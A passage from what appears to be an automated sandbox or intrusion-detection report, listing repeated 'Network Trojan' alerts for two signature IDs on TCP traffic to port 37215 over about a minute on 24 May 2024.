              SID:2835222
              Source Port:59972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631368
              SID:2835222
              Source Port:45504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598523
              SID:2829579
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270644
              SID:2835222
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346987
              SID:2835222
              Source Port:34506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341211
              SID:2835222
              Source Port:43032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073647
              SID:2835222
              Source Port:40618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802928
              SID:2835222
              Source Port:53086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664994
              SID:2829579
              Source Port:53744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878184
              SID:2835222
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598214
              SID:2835222
              Source Port:47392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242047
              SID:2829579
              Source Port:46702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517885
              SID:2835222
              Source Port:60990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452790
              SID:2829579
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246136
              SID:2835222
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663452
              SID:2835222
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923983
              SID:2835222
              Source Port:37002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459649
              SID:2829579
              Source Port:36860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078731
              SID:2835222
              Source Port:33340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157585
              SID:2829579
              Source Port:55688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432283
              SID:2829579
              Source Port:47942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516488
              SID:2829579
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987490
              SID:2835222
              Source Port:44890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098102
              SID:2829579
              Source Port:45192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060846
              SID:2835222
              Source Port:54650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576434
              SID:2835222
              Source Port:48854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103662
              SID:2835222
              Source Port:41696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575802
              SID:2835222
              Source Port:58630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429777
              SID:2835222
              Source Port:41838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623018
              SID:2829579
              Source Port:58352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073857
              SID:2835222
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553188
              SID:2829579
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990791
              SID:2829579
              Source Port:50928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637754
              SID:2829579
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128113
              SID:2835222
              Source Port:55242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504595
              SID:2829579
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313780
              SID:2829579
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245729
              SID:2835222
              Source Port:48122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537331
              SID:2835222
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880288
              SID:2829579
              Source Port:41276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692427
              SID:2829579
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516547
              SID:2835222
              Source Port:46358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202646
              SID:2829579
              Source Port:44714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355038
              SID:2835222
              Source Port:36912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661297
              SID:2835222
              Source Port:58266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199879
              SID:2835222
              Source Port:49986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123579
              SID:2835222
              Source Port:57322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123275
              SID:2829579
              Source Port:36128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554042
              SID:2829579
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.834370
              SID:2835222
              Source Port:60998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873858
              SID:2829579
              Source Port:59400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581566
              SID:2835222
              Source Port:39774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151132
              SID:2829579
              Source Port:55778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973678
              SID:2835222
              Source Port:49576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542874
              SID:2835222
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538156
              SID:2835222
              Source Port:55520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799133
              SID:2829579
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411037
              SID:2835222
              Source Port:53258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857397
              SID:2829579
              Source Port:44854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402296
              SID:2829579
              Source Port:52164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572449
              SID:2835222
              Source Port:60736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203036
              SID:2829579
              Source Port:59874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702793
              SID:2835222
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770870
              SID:2835222
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118712
              SID:2835222
              Source Port:47690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129788
              SID:2835222
              Source Port:42754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329782
              SID:2835222
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102992
              SID:2835222
              Source Port:57802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.986379
              SID:2835222
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040976
              SID:2829579
              Source Port:55116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474128
              SID:2835222
              Source Port:36700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814876
              SID:2829579
              Source Port:38838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456897
              SID:2835222
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663586
              SID:2835222
              Source Port:33488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429606
              SID:2835222
              Source Port:41734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477307
              SID:2835222
              Source Port:43314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485744
              SID:2835222
              Source Port:56704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865530
              SID:2835222
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456628
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537343
              SID:2835222
              Source Port:59878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703575
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205977
              SID:2835222
              Source Port:51428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151035
              SID:2835222
              Source Port:46196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401584
              SID:2835222
              Source Port:37236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398327
              SID:2829579
              Source Port:45450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449875
              SID:2835222
              Source Port:54274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503984
              SID:2835222
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637681
              SID:2835222
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747876
              SID:2829579
              Source Port:46218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279441
              SID:2829579
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574729
              SID:2829579
              Source Port:37352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421633
              SID:2829579
              Source Port:53088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041258
              SID:2835222
              Source Port:47502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071021
              SID:2835222
              Source Port:42228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591700
              SID:2829579
              Source Port:42886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633993
              SID:2829579
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543030
              SID:2829579
              Source Port:32946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801787
              SID:2829579
              Source Port:35070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063837
              SID:2835222
              Source Port:41558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446930
              SID:2829579
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859008
              SID:2835222
              Source Port:34142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460567
              SID:2829579
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575306
              SID:2835222
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375013
              SID:2835222
              Source Port:47978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396452
              SID:2835222
              Source Port:55744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920815
              SID:2835222
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684986
              SID:2835222
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926618
              SID:2829579
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108001
              SID:2835222
              Source Port:34996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450406
              SID:2835222
              Source Port:46082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660875
              SID:2829579
              Source Port:41810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049071
              SID:2829579
              Source Port:55788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547366
              SID:2835222
              Source Port:42084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282382
              SID:2835222
              Source Port:35076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700581
              SID:2835222
              Source Port:39576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803073
              SID:2835222
              Source Port:59014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406434
              SID:2829579
              Source Port:58014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575233
              SID:2829579
              Source Port:50342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059554
              SID:2829579
              Source Port:33380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054164
              SID:2835222
              Source Port:49482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480752
              SID:2829579
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537057
              SID:2835222
              Source Port:48800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634678
              SID:2829579
              Source Port:40732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040534
              SID:2835222
              Source Port:55486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584900
              SID:2835222
              Source Port:39828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493195
              SID:2835222
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923863
              SID:2829579
              Source Port:53890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374659
              SID:2835222
              Source Port:50712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395149
              SID:2835222
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545543
              SID:2835222
              Source Port:56398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341148
              SID:2835222
              Source Port:54500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073285
              SID:2829579
              Source Port:38402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522232
              SID:2835222
              Source Port:43686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515521
              SID:2829579
              Source Port:33380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459643
              SID:2829579
              Source Port:49494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270745
              SID:2829579
              Source Port:59334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631179
              SID:2829579
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112633
              SID:2829579
              Source Port:52132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638063
              SID:2835222
              Source Port:45066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200777
              SID:2835222
              Source Port:51524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542939
              SID:2835222
              Source Port:54646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340650
              SID:2835222
              Source Port:49772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638418
              SID:2835222
              Source Port:41236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280241
              SID:2829579
              Source Port:52158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289288
              SID:2835222
              Source Port:49632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814669
              SID:2835222
              Source Port:44972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578841
              SID:2829579
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629424
              SID:2835222
              Source Port:52406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462954
              SID:2835222
              Source Port:50856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374501
              SID:2835222
              Source Port:60976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390496
              SID:2829579
              Source Port:50768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333997
              SID:2835222
              Source Port:42566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346986
              SID:2835222
              Source Port:43554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536646
              SID:2829579
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279004
              SID:2835222
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695056
              SID:2829579
              Source Port:50092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103036
              SID:2829579
              Source Port:37222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482200
              SID:2829579
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151035
              SID:2829579
              Source Port:44262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148916
              SID:2835222
              Source Port:40890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186545
              SID:2835222
              Source Port:55356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835232
              SID:2835222
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750492
              SID:2829579
              Source Port:34100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536889
              SID:2835222
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062866
              SID:2835222
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061416
              SID:2829579
              Source Port:59900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102245
              SID:2835222
              Source Port:49350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205918
              SID:2835222
              Source Port:48670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265845
              SID:2829579
              Source Port:56514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576518
              SID:2835222
              Source Port:49914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070919
              SID:2829579
              Source Port:54018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487376
              SID:2835222
              Source Port:49862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872428
              SID:2835222
              Source Port:43368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817766
              SID:2829579
              Source Port:35186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724236
              SID:2835222
              Source Port:52682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189528
              SID:2835222
              Source Port:53874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700474
              SID:2829579
              Source Port:50882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329794
              SID:2829579
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449293
              SID:2835222
              Source Port:43118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663410
              SID:2835222
              Source Port:51120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764587
              SID:2835222
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313354
              SID:2835222
              Source Port:60938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725499
              SID:2829579
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269379
              SID:2829579
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881797
              SID:2829579
              Source Port:53958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492386
              SID:2835222
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099647
              SID:2835222
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660890
              SID:2835222
              Source Port:43720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394010
              SID:2829579
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447872
              SID:2829579
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456940
              SID:2835222
              Source Port:37348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278348
              SID:2835222
              Source Port:56226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064470
              SID:2835222
              Source Port:56358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574422
              SID:2835222
              Source Port:35526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151025
              SID:2829579
              Source Port:45272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067982
              SID:2829579
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382910
              SID:2835222
              Source Port:42310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978319
              SID:2835222
              Source Port:36752
              Destination Port:37215
